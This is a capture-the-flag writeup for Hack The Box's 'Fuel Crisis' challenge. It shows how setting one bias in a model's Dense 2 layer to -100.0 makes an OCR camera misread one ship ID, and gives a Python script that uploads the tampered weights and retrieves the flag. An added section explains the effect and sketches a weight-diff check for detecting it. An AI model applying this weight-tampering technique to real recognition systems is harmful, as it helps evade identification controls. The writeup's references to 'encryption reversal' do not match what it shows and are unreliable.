HackTheBox Fuel Crisis Writeup

Explore the basics of cybersecurity in the Fuel Crisis Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/741

Description

After travelling for too many light years, we managed to reach an uninhabited planet to rest for a while. We got a problem though. Phalcon is running out of fuel and we need to stop at the nearest space station to refuel. The closest one is the B1-4S3D station, where we are unfortunately banned from docking our ship. Our surveillance showed that the station uses two OCR cameras to read the unique ID of each spaceship entering. The first one is used as a validator for the second one. We’ve managed to find a way to disable the validation process for a split second while our ship passes, but we still need to pass through the second camera. Furthermore, our lead hacker opened a connection with the second camera, which we can use to upload our custom model weights. Try to find a way to change the predictions of the model when we pass through the second gate. Be careful though, the other four spaceships that are in front of us need to be ID’d correctly so no suspicion raises.

Exploitation

Right-click in HDFView, reload as read-write, double-click the bias in Dense 2, set it to -100.0, and save the changes.

import argparse

import requests
from bs4 import BeautifulSoup


def main(server_address):
    # Expect the target as ip:port.
    try:
        ip, port = server_address.split(':')
    except ValueError:
        print("Error: Please provide the server address in the format ip:port")
        return
    url = f"http://{ip}:{port}/"

    # Upload the modified weights; the context manager closes the file handle.
    try:
        with open('model.h5', 'rb') as model_file:
            response = requests.post(url, files={'file': model_file}, timeout=30)
        print(" > Uploaded payload model weights...")
    except OSError as e:
        print(f"Failed to read model.h5: {e}")
        return
    except requests.exceptions.RequestException as e:
        print(f"Failed to upload payload: {e}")
        return

    # Trigger the docking check that runs the uploaded model.
    try:
        response = requests.post(url + "dock", timeout=30)
        print(" > Docking ship...")
    except requests.exceptions.RequestException as e:
        print(f"Failed to dock ship: {e}")
        return

    # The flag is returned in the first <p> element of the response page.
    soup = BeautifulSoup(response.text, features="html.parser")
    flag = soup.find('p')
    if flag is None:
        print(" > No <p> element in the response; flag not found.")
        return
    print(" > Got flag...")
    print(f" > {flag.text}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Send a file and retrieve a flag from a server.")
    parser.add_argument("server_address", help="Server address in the format ip:port")
    args = parser.parse_args()
    main(args.server_address)
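
Why one edited bias is enough to change a prediction while the other inputs still classify correctly, and how a baseline comparison on the receiving side would catch it. This is an added example, not code from the writeup or the challenge: the 3-class layer, the samples and the tensor names `dense_2/kernel` and `dense_2/bias` are constructed stand-ins for the real model, and `diff_weights` is a hypothetical check.

```python
import math

# Constructed 3-class output layer standing in for the writeup's "Dense 2".
KERNEL = [[2.0, -1.0, -1.0], [-1.0, 2.0, 0.5], [-1.0, 0.5, 2.0]]
BIAS = [0.1, -0.2, 0.05]
TAMPERED_BIAS = [0.1, -100.0, 0.05]  # one bias set to -100.0, as in the writeup
SAMPLES = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]  # one per class


def softmax(logits):
    peak = max(logits)  # subtract the max for numerical stability
    exps = [math.exp(z - peak) for z in logits]
    total = sum(exps)
    return [e / total for e in exps]


def predict(x, kernel, bias):
    """Dense layer + softmax: logit[j] = sum_i x[i] * kernel[i][j] + bias[j]."""
    logits = [sum(xi * row[j] for xi, row in zip(x, kernel)) + b
              for j, b in enumerate(bias)]
    probs = softmax(logits)
    best = max(range(len(probs)), key=probs.__getitem__)
    return best, probs


def classify_all(bias):
    """Predicted class for each constructed sample under the given bias."""
    return [predict(x, KERNEL, bias)[0] for x in SAMPLES]


def diff_weights(baseline, candidate, tol=1e-6):
    """List (tensor, index, trusted, uploaded) for every value that changed."""
    findings = []
    for name, trusted in baseline.items():
        uploaded = candidate.get(name)
        if uploaded is None or len(uploaded) != len(trusted):
            findings.append((name, None, None, None))  # missing or reshaped
            continue
        findings += [(name, i, a, b)
                     for i, (a, b) in enumerate(zip(trusted, uploaded))
                     if abs(a - b) > tol]
    return findings


if __name__ == "__main__":
    flat = [v for row in KERNEL for v in row]
    print("trusted :", classify_all(BIAS))
    print("tampered:", classify_all(TAMPERED_BIAS))
    print(diff_weights({"dense_2/kernel": flat, "dense_2/bias": BIAS},
                       {"dense_2/kernel": flat, "dense_2/bias": TAMPERED_BIAS}))
```

The large negative bias drives that class's softmax probability to effectively zero, so the second sample falls through to its runner-up class while the other two are unaffected; a per-tensor diff against trusted weights pinpoints the single changed value before the model is loaded.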

Summary

The Fuel Crisis Challenge on Hack The Box is an easy-level, beginner-friendly challenge that focuses on encryption reversal, file handling, and basic server interactions. It involves modifying a model’s bias using HDFView and utilizing a Python script to upload a payload, dock a ship, and extract a flag from the server response, offering a practical introduction to common CTF cybersecurity techniques.

This post is licensed under CC BY 4.0 by the author.